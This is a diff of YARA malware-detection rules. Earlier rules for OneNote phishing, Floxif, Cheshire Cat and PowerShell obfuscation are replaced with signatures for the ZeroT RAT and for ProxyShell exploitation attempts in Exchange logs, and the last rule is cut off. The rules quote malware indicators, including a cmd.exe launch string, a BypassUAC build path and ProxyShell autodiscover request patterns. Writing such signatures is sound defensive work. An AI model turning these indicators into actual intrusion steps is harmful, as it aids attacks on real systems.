-		description = "Detects suspicious embedded file types in OneNote files"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0664d202-ab4c-57b6-91ee-ea21ac08909e"
-		date = "2023-01-27"
+		id = "2a7c6a36-aace-562e-bbc4-425c1d93fab1"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://blog.didierstevens.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L108-L125"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L77-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bc07598570b6d4ebc5d14cedfed146c1ad309b8890bc0b9ee5f9ad645c1352e2"
-		score = 65
+		logic_hash = "fbc1a2e078cfae7a9c72612b9c769e84d8c1d59c89e05001571ad00071e38577"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "74dd52aeac83cc01c348528a9bcb20bbc34622b156f40654153e41817083ba1d"
 
 	strings:
-		$a1 = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
-		$s1 = "<HTA:APPLICATION "
+		$x1 = "dbozcb" fullword ascii
+		$s1 = "nflogger.dll" fullword ascii
+		$s2 = "/svchost.exe" fullword ascii
+		$s3 = "1207.htm" fullword ascii
+		$s4 = "/1207.htm" fullword ascii
 
 	condition:
-		filesize < 5MB and $a1 and 1 of ( $s* )
+		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_MAL_Floxif_Generic : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_6 : FILE
 {
 	meta:
-		description = "Detects Floxif Malware"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ddd6a6c-b02a-518b-bbe3-8f528b3d7eae"
-		date = "2018-05-11"
+		id = "2e3bb4bd-5e20-56e7-a82b-d717d83eaeeb"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_floxif_flystudio.yar#L3-L18"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L97-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1996f717100d9f1abc2ed3f1e9d0c55daec09654c0f99987ddaea9e9f0d17008"
-		score = 80
+		logic_hash = "2de78012cc384211cef6c12817fd8cef9d93eef6de3197d0cfec64c1a8022ae3"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
+		hash1 = "a16078c6d09fcfc9d6ff7a91e39e6d72e2d6d6ab6080930e1e2169ec002b37d3"
+
+	strings:
+		$s1 = "jGetgQ|0h9=" fullword ascii
+		$s2 = "\\sfxrar32\\Release\\sfxrar.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-
-rule SIGNATURE_BASE_MAL_CN_Flystudio_May18_1 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_7 : FILE
 {
 	meta:
-		description = "Detects malware / hacktool detected in May 2018"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b78b9ea0-5eef-5922-b5d7-d3c5ddce7fad"
-		date = "2018-05-11"
+		id = "e9cdca86-84a8-5673-935c-c319b523674b"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_floxif_flystudio.yar#L21-L38"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L113-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d03f02a270d8664175b65398c01ec4f0ea182437b31847f9bf4181edb0c36bb"
+		logic_hash = "87ab6cd5c769e7e38bef807fa7d15af3a66fed8fdb7fed49fa62d87e1049ceb4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b85147366890598518d4f277d44506eef871fd7fc6050d8f8e68889cae066d9e"
+		hash1 = "fc2d47d91ad8517a4a974c4570b346b41646fac333d219d2f1282c96b4571478"
 
 	strings:
-		$s1 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
-		$s2 = "www.cfyhack.cn" fullword ascii
+		$s1 = "RasTls.dll" fullword ascii
+		$s2 = "RasTls.exe" fullword ascii
+		$s4 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "65ae5cf17140aeaf91e3e9911da0ee3e" or 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-
-rule SIGNATURE_BASE_MAL_Ransomware_Wadhrama : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_8 : FILE
 {
 	meta:
-		description = "Detects Wadhrama Ransomware via Imphash"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7de40e9-fe22-5f14-abc6-f6611a4382ac"
-		date = "2019-04-07"
+		id = "f9a4f092-c699-5e91-9667-64ffe1b02bc1"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mal_ransom_wadharma.yar#L3-L13"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L131-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d78837ed7cb8914be0990859751cf64603ee5a5ad135541c60c6ae145046412"
+		logic_hash = "a1d5e72970919cd5c0493f8882cbc6fb1bb3c5b6517813a4022efd0028dfe728"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "557c68e38dce7ea10622763c10a1b9f853c236b3291cd4f9b32723e8714e5576"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4ef91c17b1415609a2394d2c6c353318a2503900e400aab25ab96c9fe7dc92ff"
+
+	strings:
+		$s1 = "/svchost.exe" fullword ascii
+		$s2 = "RasTls.dll" fullword ascii
+		$s3 = "20160620.htm" fullword ascii
+		$s4 = "/20160620.htm" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f86dec4a80961955a89e7ed62046cc0e"
+		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them )
 }
-rule SIGNATURE_BASE_MAL_BACKORDER_LOADER_WIN_Go_Jan23 : LOADER GOLANG BACKORDER MALWARE WINDOWS FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_9 : FILE
 {
 	meta:
-		description = "Detects the BACKORDER loader compiled in GO which download and executes a second stage payload from a remote server."
-		author = "Arda Buyukkaya (modified by Florian Roth)"
-		id = "90a82f2c-be92-5d0b-b47e-f47db2b15867"
-		date = "2025-01-23"
-		modified = "2025-03-20"
-		reference = "EclecticIQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_go_backorder_loader.yar#L1-L31"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1c32993-409c-5a62-8239-cff99fb83a7f"
+		date = "2017-02-03"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L149-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8"
-		logic_hash = "9e79ec9e58e02b7660383ff20957b95bc3c61ed3badc9af3d5829ebe5bf6bd7b"
-		score = 80
+		logic_hash = "af4b85ef01c4fa21a2506369f3bc0f8eff6e95a4cfd494e1ea11a44d75bb024e"
+		score = 75
 		quality = 85
-		tags = "LOADER, GOLANG, BACKORDER, MALWARE, WINDOWS, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a685cf4dca6a58213e67d041bba637dca9cb3ea6bb9ad3eae3ba85229118bce0"
 
 	strings:
-		$GoBuildId = "Go build" ascii
-		$x_DebugSymbol_1 = "C:/updatescheck/main.go"
-		$x_DebugSymbol_2 = "C:/Users/IEUser/Desktop/Majestic/"
-		$s_FunctionName_1 = "main.getUpdates.func"
-		$s_FunctionName_2 = "main.obt_zip"
-		$s_FunctionName_3 = "main.obtener_zip"
-		$s_FunctionName_4 = "main.get_zip"
-		$s_FunctionName_5 = "main.show_pr0gressbar"
-		$s_FunctionName_6 = "main.pr0cess"
+		$x1 = "nflogger.dll" fullword ascii
+		$s7 = "Zlh.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10MB and $GoBuildId and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Cheshirecat_Sample2 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Nflogger : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Chinese APT by Proofpoint ZeroT RAT  - file nflogger.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "14448138-0af3-5669-8aa3-f9e773e2a008"
-		date = "2015-08-08"
+		id = "0d23f312-e3b6-5c23-855b-25ae54265512"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cheshirecat.yar#L11-L30"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L165-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
-		logic_hash = "4dd299cfe36545dba5ccac22d2eedc405f548fe5f976514d1cfa8238b472782c"
-		score = 70
+		logic_hash = "dc9b19e3c4c321cb9f840ec9ff78bec9e4a075cc62ea2823d92a3fbd9f99cc07"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "946adbeb017616d56193a6d43fe9c583be6ad1c7f6a22bab7df9db42e6e8ab10"
 
 	strings:
-		$s0 = "mpgvwr32.dll" fullword ascii
-		$s1 = "Unexpected failure of wait! (%d)" fullword ascii
-		$s2 = "\"%s\" /e%d /p%s" fullword ascii
-		$s4 = "error in params!" fullword ascii
-		$s5 = "sscanf" fullword ascii
-		$s6 = "<>Param : 0x%x" fullword ascii
+		$x1 = "\\LoaderDll.VS2010\\Release\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Cheshirecat_Gen1 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Go : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Chinese APT by Proofpoint ZeroT RAT  - file Go.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2068feed-2101-5b12-9e36-db7b0f5cc4ec"
-		date = "2015-08-08"
-		modified = "2023-12-05"
-		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cheshirecat.yar#L35-L74"
+		id = "ba929e6d-4162-58e7-b8a8-bcb066b64522"
+		date = "2017-02-04"
+		modified = "2023-01-06"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L180-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d1bbda9340bc2d2fcefd6bf9a3c30fe0b99c66fb978b3a4583f17c521cfcf4b0"
-		score = 90
+		logic_hash = "bf5e2d825e4bd63e94455ffb4013fa1088098a826390c1916c0aa50866588fcb"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
-		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
-		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
-		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
+		hash1 = "83ddc69fe0d3f3d2f46df7e72995d59511c1bfcca1a4e14c330cb71860b4806b"
 
 	strings:
-		$x1 = "CAPESPN.DLL" fullword wide
-		$x2 = "WINF.DLL" fullword wide
-		$x3 = "NCFG.DLL" fullword wide
-		$x4 = "msgrthlp.dll" fullword wide
-		$x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
-		$x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
-		$a1 = "Interface\\%s\\info" fullword ascii
-		$a2 = "Interface\\%s\\info\\%s" fullword ascii
-		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
-		$a4 = "CLSID\\%s\\info" fullword ascii
-		$b1 = "Windows Shell Icon Handler" fullword wide
-		$b2 = "Microsoft Shell Icon Handler" fullword wide
-		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
-		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
-		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
-		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
-		$s5 = "%sMutex" fullword ascii
-		$s6 = "\\ShellIconCache" ascii
-		$s7 = "+6Service Pack " fullword ascii
+		$x1 = "%s\\cmd.exe /c %s\\Zlh.exe" fullword ascii
+		$x2 = "\\BypassUAC.VS2010\\Release\\" ascii
+		$s1 = "Zjdsf.exe" fullword ascii
+		$s2 = "SS32prep.exe" fullword ascii
+		$s3 = "windowsgrep.exe" fullword ascii
+		$s4 = "Sysdug.exe" fullword ascii
+		$s5 = "Proessz.exe" fullword ascii
+		$s6 = "%s\\Zlh.exe" fullword ascii
+		$s7 = "/C %s\\%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 350KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* ) and 1 of ( $x* )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 7 of them )
 }
-rule SIGNATURE_BASE_Cheshirecat_Gen2 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Mcutil : FILE
 {
 	meta:
-		description = "Cheshire Cat Malware"
+		description = "Chinese APT by Proofpoint ZeroT RAT  - file Mcutil.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b97b20bd-f6b9-512f-ba99-6c38ba7853be"
-		date = "2015-08-08"
+		id = "c887d36b-8aeb-54f1-a683-727561723238"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cheshirecat.yar#L76-L108"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L205-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c5d6ce6cc09c416d3449f7f5fc09139ce9271b69d743832b4b2548682e4ddf1"
-		score = 70
+		logic_hash = "edb6000fd65d6593bd94842e60ec099c5a652d10005f81d17063dba1a2e267d2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
-		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
-		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
-		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
+		hash1 = "266c06b06abbed846ebabfc0e683f5d20dadab52241bc166b9d60e9b8493b500"
 
 	strings:
-		$a1 = "Interface\\%s\\info" fullword ascii
-		$a2 = "Interface\\%s\\info\\%s" fullword ascii
-		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
-		$a4 = "CLSID\\%s\\info" fullword ascii
-		$b1 = "Windows Shell Icon Handler" fullword wide
-		$b2 = "Microsoft Shell Icon Handler" fullword wide
-		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
-		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
-		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
-		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
-		$s5 = "%sMutex" fullword ascii
-		$s6 = "\\ShellIconCache" ascii
-		$s7 = "+6Service Pack " fullword ascii
+		$s1 = "LoaderDll.dll" fullword ascii
+		$s2 = "QageBox1USER" fullword ascii
+		$s3 = "xhmowl" fullword ascii
+		$s4 = "?KEYKY" fullword ascii
+		$s5 = "HH:mm:_s" fullword ascii
+		$s6 = "=licni] has maX0t" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 3 of them ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_BKDR_Snarasite_Oct17 : FILE
+rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Zlh : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Chinese APT by Proofpoint ZeroT RAT - file Zlh.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a5d156a-529b-52ae-9b6a-d454895eb1fb"
-		date = "2017-10-07"
+		id = "4c8b9a90-6cb3-5aba-a993-f73207341d0e"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_snarasite.yar#L3-L17"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L225-L241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79f49bce6de996d20b64476feb73987fdcd7555963ea1a596648d8702fbd2898"
+		logic_hash = "26796f75a8302bd6c93eb3ea43d0491b86770b52bd11aad6e1e250d968a77004"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "36ba92cba23971ca9d16a0b4f45c853fd5b3108076464d5f2027b0f56054fd62"
+		hash1 = "711f0a635bbd6bf1a2890855d0bd51dff79021db45673541972fe6e1288f5705"
+
+	strings:
+		$s1 = "nflogger.dll" fullword wide
+		$s2 = "%s %d: CreateProcess('%s', '%s') failed. Windows error code is 0x%08x" fullword ascii
+		$s3 = "_StartZlhh(): Executed \"%s\"" ascii
+		$s4 = "Executable: '%s' (%s) %i" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "322bef04e1e1ac48875036e38fb5c23c" or pe.imphash ( ) == "15088754757513c92fa36ba5590e907b" )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_Powershell_Case_Anomaly : FILE
+rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Failed_Aug21_1 : SCRIPT
 {
 	meta:
-		description = "Detects obfuscated PowerShell hacktools"
+		description = "Detects ProxyShell exploitation attempts in log files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "41c97d15-c167-5bdd-a8b4-871d14f66fe1"
-		date = "2017-08-11"
-		modified = "2022-06-12"
-		reference = "https://twitter.com/danielhbohannon/status/905096106924761088"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_case_anomalies.yar#L11-L60"
+		id = "9b849042-8918-5322-a35a-2165d4b541d5"
+		date = "2021-08-08"
+		modified = "2021-08-09"
+		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbef94b899a2d22930ee0e8b3eac03c505db629d19a62ddd8f56482403dfa595"
-		score = 70
-		quality = 77
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "690e74633ac8671727fe47f6398e536c1b7a4ac469d27d3f7507c75e175716bd"
+		score = 50
+		quality = 60
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "powershell" nocase ascii wide
-		$sn1 = "powershell" ascii wide
-		$sn2 = "Powershell" ascii wide
-		$sn3 = "PowerShell" ascii wide
-		$sn4 = "POWERSHELL" ascii wide
-		$sn5 = "powerShell" ascii wide
-		$sn6 = "PowerShelL" ascii wide
-		$sn7 = "PowershelL" ascii wide
-		$a1 = "wershell -e " nocase wide ascii
-		$an1 = "wershell -e " wide ascii
-		$an2 = "werShell -e " wide ascii
-		$k1 = "-noprofile" fullword nocase ascii wide
-		$kn1 = "-noprofile" ascii wide
-		$kn2 = "-NoProfile" ascii wide
-		$kn3 = "-noProfile" ascii wide
-		$kn4 = "-NOPROFILE" ascii wide
-		$kn5 = "-Noprofile" ascii wide
-		$fp1 = "Microsoft Code Signing" ascii fullword
-		$fp2 = "Microsoft Corporation" ascii
-		$fp3 = "Microsoft.Azure.Commands.ContainerInstance" wide
-		$fp4 = "# Localized PSGet.Resource.psd1" wide
+		$xr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|mapi\/nspi|EWS\/|X-Rps-CAT)[^\n]{1,400}401 0 0/ nocase ascii
+		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}401 0 0/ nocase ascii
 
 	condition:
-		filesize < 800KB and ( ( #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5 + #sn6 + #sn7 ) or ( #a1 > #an1 + #an2 ) or ( #k1 > #kn1 + #kn2 + #kn3 + #kn4 + #kn5 ) ) and not 1 of ( $fp* )
+		1 of them
 }
-rule SIGNATURE_BASE_Wscriptshell_Case_Anomaly : FILE
+rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Successful_Aug21_1 : SCRIPT
 {
 	meta:
-		description = "Detects obfuscated wscript.shell commands"
+		description = "Detects successful ProxyShell exploitation attempts in log files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d69d932d-1e39-5259-9200-f0227754f49c"
-		date = "2017-09-11"
-		modified = "2022-06-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_case_anomalies.yar#L62-L84"
+		id = "8c11cd1a-6d3f-5f29-af61-17179b01ca8b"
+		date = "2021-08-08"
+		modified = "2025-03-21"
+		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L17-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5c64e124186ae2eb974639627287fb27fe27eb2855342703e4a27a9c0fd62a91"
-		score = 60
+		logic_hash = "06ab609a8efe3b36b6356a9cf7b7b11b2fc2a556ec1df6995008a9df86b3fcee"
+		score = 65
 		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "WScript.Shell\").Run" nocase ascii wide
-		$sn1 = "WScript.Shell\").Run" ascii wide
-		$sn2 = "wscript.shell\").run" ascii wide
-		$sn3 = "WSCRIPT.SHELL\").RUN" ascii wide
-		$sn4 = "Wscript.Shell\").Run" ascii wide
-		$sn5 = "WScript.shell\").Run" ascii wide
+		$xr1a = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|X-Rps-CAT)/ nocase ascii
+		$xr1b = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(mapi\/nspi|EWS\/)[^\n]{1,400}(200|302) 0 0/
+		$xr2 = /autodiscover\/autodiscover\.json[^\n]{1,60}&X-Rps-CAT=/ nocase ascii
+		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}200 0 0/ nocase ascii
 
 	condition:
-		filesize < 3000KB and #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5
+		1 of them
 }
-rule SIGNATURE_BASE_KR_Target_Malware_Aug17 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_2 : FILE
 {
 	meta:
-		description = "Detects malware that targeted South Korea in Aug 2017 - file MRDqsbuEqGxrgqtbXU.exe"
+		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST), size and content"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2a6a7921-953a-502c-9702-b27325b2c3b8"
-		date = "2017-08-23"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/eyalsela/status/900250203097354240"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kr_malware.yar#L11-L35"
+		id = "a351a466-695e-570e-8c7f-9c6c0534839c"
+		date = "2021-08-13"
+		modified = "2025-11-03"
+		reference = "https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L35-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47c3350b489b023687f05f55a09f0092456c87b4beeda563756a99ccd5091b09"
